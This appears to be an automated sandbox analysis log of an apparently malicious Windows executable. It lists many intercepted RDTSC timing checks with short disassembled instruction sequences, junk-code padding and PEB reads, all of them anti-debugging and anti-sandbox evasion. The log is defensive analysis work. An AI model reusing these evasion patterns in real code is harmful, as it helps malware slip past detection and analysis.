Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CDC23C second address: CDC260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007FBCB0E4CF66h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCB0E4CF74h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CDC260 second address: CDC283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCB0ED65FDh 0x00000008 jmp 00007FBCB0ED6601h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CDC283 second address: CDC289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101C8 second address: C101D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FBCB0ED65F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101D7 second address: C101DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101DB second address: C101EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBCB0ED65F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101EF second address: C1020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBCB0E4CF76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CEA0FE second address: CEA10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007FBCB0ED65F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CEEB17 second address: CEEB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFE9B8 second address: CFE9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBCB0ED65F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFE9C6 second address: CFE9D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFEEA6 second address: CFEEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBCB0ED65F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFEEB7 second address: CFEEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFFC9A second address: CFFCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFFCA0 second address: CFFCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFFCA4 second address: CFFCBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6605h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D03543 second address: D03547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D03547 second address: D03575 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBCB0ED6601h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FBCB0ED6601h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D033A5 second address: D033B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D055EB second address: D055EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D0516D second address: D05173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D05173 second address: D05177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D05177 second address: D051AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBCB0E4CF6Bh 0x0000000c jmp 00007FBCB0E4CF76h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007FBCB0E4CF74h 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D052CB second address: D052D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D052D1 second address: D052DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D052DF second address: D052EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FBCB0ED65F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D0A344 second address: D0A35E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D0A35E second address: D0A36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D4AD84 second address: D4AD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Fh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D4AD9D second address: D4ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D4EAA2 second address: D4EAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D42EBE second address: D42EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBCB0ED65F6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5CD6D second address: D5CD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5C8E6 second address: D5C902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5C902 second address: D5C90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FBCB0E4CF66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5CAA2 second address: D5CAA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5CAA8 second address: D5CAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FBCB0E4CF78h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A082 second address: E2A0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6609h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A0A5 second address: E2A0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A0AA second address: E2A0C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FBCB0ED65FCh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A0C0 second address: E2A0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E28F12 second address: E28F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2905C second address: E29077 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBCB0E4CF72h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29077 second address: E290AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBCB0ED65FEh 0x0000000b jmp 00007FBCB0ED65FFh 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FBCB0ED65F6h 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29200 second address: E2920F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2920F second address: E29217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E297ED second address: E2981B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBCB0E4CF70h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jmp 00007FBCB0E4CF70h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2981B second address: E29825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCB0ED65F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29825 second address: E29829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29829 second address: E29831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29AED second address: E29AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FBCB0E4CF66h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C34 second address: E29C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C38 second address: E29C40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C40 second address: E29C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C46 second address: E29C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C50 second address: E29C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C54 second address: E29C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C64 second address: E29C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C68 second address: E29C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29DD1 second address: E29DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29DD7 second address: E29DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2B825 second address: E2B82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2B82B second address: E2B846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FBCB0E4CF66h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120064 second address: 7120068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120068 second address: 712006E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712006E second address: 71200AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e jmp 00007FBCB0ED6603h 0x00000013 sub esp, 18h 0x00000016 pushad 0x00000017 mov esi, 18FC554Bh 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBCB0ED65FFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71200AE second address: 71200B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71200B5 second address: 71200EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f pushfd 0x00000010 jmp 00007FBCB0ED6606h 0x00000015 and ecx, 3E086FE8h 0x0000001b jmp 00007FBCB0ED65FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71200EE second address: 7120106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120106 second address: 712017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e jmp 00007FBCB0ED6606h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBCB0ED65FEh 0x0000001b adc cx, 27D8h 0x00000020 jmp 00007FBCB0ED65FBh 0x00000025 popfd 0x00000026 mov dh, ah 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b movzx eax, di 0x0000002e push edx 0x0000002f call 00007FBCB0ED6608h 0x00000034 pop esi 0x00000035 pop edi 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b mov si, CFB9h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712017E second address: 71201B6 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bx, ax 0x0000000a popad 0x0000000b mov esi, dword ptr [775606ECh] 0x00000011 jmp 00007FBCB0E4CF6Ch 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBCB0E4CF77h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71201B6 second address: 71201F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FBCB0ED65FBh 0x0000000c xor cl, FFFFFFBEh 0x0000000f jmp 00007FBCB0ED6609h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jne 00007FBCB0ED7473h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71201F3 second address: 71201F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71201F7 second address: 7120281 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FBCB0ED6605h 0x0000000c add ax, 17A6h 0x00000011 jmp 00007FBCB0ED6601h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FBCB0ED6603h 0x00000022 adc cl, FFFFFFDEh 0x00000025 jmp 00007FBCB0ED6609h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FBCB0ED6600h 0x00000031 add al, FFFFFFD8h 0x00000034 jmp 00007FBCB0ED65FBh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120378 second address: 712037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712037C second address: 7120382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120382 second address: 71203C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push edi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov dh, 09h 0x00000012 popad 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBCB0E4CF76h 0x0000001b or si, DD08h 0x00000020 jmp 00007FBCB0E4CF6Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71203C3 second address: 712046B instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push dword ptr [eax] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBCB0ED65FDh 0x00000011 sub ecx, 29EEE826h 0x00000017 jmp 00007FBCB0ED6601h 0x0000001c popfd 0x0000001d call 00007FBCB0ED6600h 0x00000022 pushfd 0x00000023 jmp 00007FBCB0ED6602h 0x00000028 or esi, 1F993CF8h 0x0000002e jmp 00007FBCB0ED65FBh 0x00000033 popfd 0x00000034 pop eax 0x00000035 popad 0x00000036 mov eax, dword ptr fs:[00000030h] 0x0000003c jmp 00007FBCB0ED65FFh 0x00000041 push dword ptr [eax+18h] 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushfd 0x00000048 jmp 00007FBCB0ED6602h 0x0000004d sub eax, 2D2A8688h 0x00000053 jmp 00007FBCB0ED65FBh 0x00000058 popfd 0x00000059 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712046B second address: 712048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov dh, al 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712048B second address: 712048F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204A2 second address: 71204A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204A6 second address: 71204B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204B8 second address: 71204D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204D1 second address: 71204D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
